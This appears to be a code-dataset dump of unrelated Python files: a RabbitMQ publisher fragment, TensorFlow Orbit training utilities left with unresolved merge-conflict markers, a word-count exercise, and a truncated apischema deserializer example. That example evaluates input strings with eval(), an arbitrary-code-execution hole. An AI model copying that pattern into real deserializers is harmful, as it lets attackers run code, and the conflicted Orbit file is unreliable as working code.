# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | en | 0.632426 | # -*- coding: utf-8 -*- Created on Mon Oct 21 08:47:08 2019 @author: dordoloy # Parse CLODUAMQP_URL (fallback to localhost) # Connect to CloudAMQP | 2.740541 | 3 |
orbit/utils.py | xjx0524/models | 0 | 9163 | <<<<<<< HEAD
# Lint as: python3
=======
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
# Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
<<<<<<< HEAD
=======
import os
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
iterate until exausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
<<<<<<< HEAD
=======
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
<<<<<<< HEAD
self._summary_writer = None
=======
self._summary_writers = {}
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
<<<<<<< HEAD
@property
def summary_writer(self):
"""Returns the underlying summary writer."""
if self._summary_writer is not None:
return self._summary_writer
if self._enabled:
self._summary_writer = tf.summary.create_file_writer(self._summary_dir)
else:
self._summary_writer = tf.summary.create_noop_writer()
return self._summary_writer
def flush(self):
"""Flush the underlying summary writer."""
if self._enabled:
tf.summary.flush(self.summary_writer)
def write_summaries(self, items):
"""Write a bulk of summaries.
Args:
items: a dictionary of `Tensors` for writing summaries.
"""
# TODO(rxsang): Support writing summaries with nested structure, so users
# can split the summaries into different directories for nicer visualization
# in Tensorboard, like train and eval metrics.
if not self._enabled:
return
with self.summary_writer.as_default():
for name, tensor in items.items():
self._summary_fn(name, tensor, step=self._global_step)
=======
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
E.g. users may evaluate on muliple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
<<<<<<< HEAD
A Numpy array.
=======
A Numpy array or number.
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
"""
if not tf.is_tensor(x):
return x
return x.numpy()
| <<<<<<< HEAD
# Lint as: python3
=======
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
# Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
<<<<<<< HEAD
=======
import os
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
iterate until exausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
<<<<<<< HEAD
=======
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
<<<<<<< HEAD
self._summary_writer = None
=======
self._summary_writers = {}
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
<<<<<<< HEAD
@property
def summary_writer(self):
"""Returns the underlying summary writer."""
if self._summary_writer is not None:
return self._summary_writer
if self._enabled:
self._summary_writer = tf.summary.create_file_writer(self._summary_dir)
else:
self._summary_writer = tf.summary.create_noop_writer()
return self._summary_writer
def flush(self):
"""Flush the underlying summary writer."""
if self._enabled:
tf.summary.flush(self.summary_writer)
def write_summaries(self, items):
"""Write a bulk of summaries.
Args:
items: a dictionary of `Tensors` for writing summaries.
"""
# TODO(rxsang): Support writing summaries with nested structure, so users
# can split the summaries into different directories for nicer visualization
# in Tensorboard, like train and eval metrics.
if not self._enabled:
return
with self.summary_writer.as_default():
for name, tensor in items.items():
self._summary_fn(name, tensor, step=self._global_step)
=======
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
E.g. users may evaluate on muliple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
<<<<<<< HEAD
A Numpy array.
=======
A Numpy array or number.
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
"""
if not tf.is_tensor(x):
return x
return x.numpy()
| en | 0.760127 | # Lint as: python3 # Copyright 2020 The Orbit Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Some layered modules/functions to help users writing custom training loop. Creates a multiple steps function driven by the python while loop. Args: step_fn: A function which takes `iterator` as input. Returns: A callable defined as the `loop_fn` defination below. A loop function with multiple steps. Args: iterator: A nested structure of tf.data `Iterator` or `DistributedIterator`. num_steps: The number of steps in the loop. If `num_steps==-1`, will iterate until exausting the iterator. state: An optional initial state before running the loop. reduce_fn: a callable defined as `def reduce_fn(state, value)`, where `value` is the outputs from `step_fn`. Returns: The updated state. # To make sure the OutOfRangeError exception can be handled well with # async remote eager, we need to wrap the loop body in a `async_scope`. Create a multiple steps function driven by tf.while_loop on the host. Args: step_fn: A function which takes `iterator` as input. Returns: A callable defined as the `loop_fn` defination below. A loop function with multiple steps. Args: iterator: A nested structure of tf.data `Iterator` or `DistributedIterator`. num_steps: The number of steps in the loop. Must be a tf.Tensor. Creates a `tf.Variable` suitable for use as a global step counter. Creating and managing a global step variable may be necessary for `AbstractTrainer` subclasses that perform multiple parameter updates per `Controller` "step", or use different optimizers on different steps. In these cases, an `optimizer.iterations` property generally can't be used directly, since it would correspond to parameter updates instead of iterations in the `Controller`'s training loop. Such use cases should simply call `step.assign_add(1)` at the end of each step. Returns: A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the first replica's value retained when synchronizing across replicas in a distributed setting. A helper function to create distributed dataset. Args: strategy: An instance of `tf.distribute.Strategy`. dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an `tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If it is a function, it could optionally have an argument named `input_context` which is `tf.distribute.InputContext` argument type. *args: The list of arguments to be passed to dataset_or_fn. **kwargs: Any keyword arguments to be passed. Returns: A distributed Dataset. Wrapped dataset function for creating distributed dataset.. # If `dataset_or_fn` is a function and has `input_context` as argument # names, pass `ctx` as the value of `input_context` when calling # `dataset_or_fn`. Otherwise `ctx` will not be used when calling # `dataset_or_fn`. A class manages writing summaries. Construct a summary manager object. Args: summary_dir: the directory to write summaries. summary_fn: A callable defined as `def summary_fn(name, tensor, step=None)`, which describes the summary operation. global_step: A `tf.Variable` instance for the global step. Returns the underlying summary writer. Flush the underlying summary writer. Write a bulk of summaries. Args: items: a dictionary of `Tensors` for writing summaries. # TODO(rxsang): Support writing summaries with nested structure, so users # can split the summaries into different directories for nicer visualization # in Tensorboard, like train and eval metrics. Returns the underlying summary writer. Args: relative_path: The current path in which to write summaries, relative to the summary directory. By default it is empty, which specifies the root directory. Flush the underlying summary writers. Write summaries for the given values. This recursively creates subdirectories for any nested dictionaries provided in `summary_dict`, yielding a hierarchy of directories which will then be reflected in the TensorBoard UI as different colored curves. E.g. users may evaluate on muliple datasets and return `summary_dict` as a nested dictionary. ``` { "dataset": { "loss": loss, "accuracy": accuracy }, "dataset2": { "loss": loss2, "accuracy": accuracy2 }, } ``` This will create two subdirectories "dataset" and "dataset2" inside the summary root directory. Each directory will contain event files including both "loss" and "accuracy" summaries. Args: summary_dict: A dictionary of values. If any value in `summary_dict` is itself a dictionary, then the function will recursively create subdirectories with names given by the keys in the dictionary. The Tensor values are summarized using the summary writer instance specific to the parent relative path. An abstract class representing a "trigger" for some event. Maybe trigger the event based on the given value. Args: value: the value for triggering. force_trigger: Whether the trigger is forced triggered. Returns: `True` if the trigger is triggered on the given `value`, and `False` otherwise. Reset states in the trigger. Triggers on every fixed interval. Constructs the IntervalTrigger. Args: interval: The triggering interval. start: An initial value for the trigger. Maybe trigger the event based on the given value. Args: value: the value for triggering. force_trigger: If True, the trigger will be forced triggered unless the last trigger value is equal to `value`. Returns: `True` if the trigger is triggered on the given `value`, and `False` otherwise. See base class. A Helper class to handle epochs in Customized Training Loop. Constructs the EpochHelper. Args: epoch_steps: An integer indicates how many steps in an epoch. global_step: A `tf.Variable` instance indicates the current global step. Returns whether a new epoch should begin. Returns whether the current epoch should end. Index of the next batch within the current epoch. Context manager for soft device placement, allowing summaries on CPU. Utility function to support TPU summaries via multiple `tf.function`s. This permits interleaving summaries inside TPU-compatible code, but without any performance impact on steps that do not write summaries. Usage is as a decorator, similar to `tf.function`, and any `tf.function` arguments will be passed through if supplied: @trainer.train_function_with_summaries def train(self, num_steps): ... The decorated function is assumed to be a loop method accepting a `num_steps` parameter, as for instance would be called within the `Controller`'s outer train loop. The implementation here assumes that `summary_frequency` is divisible by `steps_per_loop`. The decorated method should accept two arguments, `self` and `num_steps`. Two `tf.function` versions of `train_fn` are created: one inside a summary writer scope with soft device placement enabled (used on steps that require summary writing), and one with no summary writer present and soft device placement disabled (used on all other steps). Args: *args: Arguments to pass through to `tf.function`. **kwargs: Keyword arguments to pass through to `tf.function`. Returns: If the first argument is a callable, returns the decorated callable. Otherwise, returns a decorator. # TODO(dhr): Validate the signature of train_fn? Returns the value of a variable/tensor. Args: x: input variable. Returns: <<<<<<< HEAD A Numpy array. ======= A Numpy array or number. >>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36 | 2.400488 | 2 |
python/word-count/word_count.py | whitepeaony/exercism-python | 0 | 9164 | def count_words(sentence):
sentence = sentence.lower()
words = {}
shit = ',\n:!&@$%^&._'
for s in shit:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
| def count_words(sentence):
sentence = sentence.lower()
words = {}
shit = ',\n:!&@$%^&._'
for s in shit:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
| none | 1 | 3.627309 | 4 |
|
examples/multiple_deserializers.py | klauer/apischema | 0 | 9165 | from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
